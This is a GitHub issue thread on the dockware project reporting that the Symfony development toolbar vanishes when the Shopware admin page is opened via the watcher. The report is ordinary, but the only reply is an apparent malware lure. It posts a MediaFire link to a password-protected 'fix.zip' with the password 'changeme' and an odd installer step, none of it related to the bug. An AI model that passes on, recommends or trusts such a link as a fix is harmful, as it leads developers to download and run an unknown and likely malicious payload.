### ISSUE TITLE
Synfony Development Toolbar not showing if using watcher

### ISSUE THREAD

**Issue by BreakingTV** [dockware/dockware#229]
**Describe the bug**
When installing the Symfony Dev-Tools a small bar will appear when you open the admin page.
If you open the admin page via the watcher it will not appear

**To Reproduce**
1. Open admin page (without watcher), see Symfony tools
2. Open admin page (with the watcher), see Symfony tools disappear

**Expected behavior**
The Symfony Tools should appear even if you have a watcher started

**Desktop (please complete the following information):**
 - OS: NixOS
 - Browser: Chromium
 - Version: 126.0.6478.182

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."
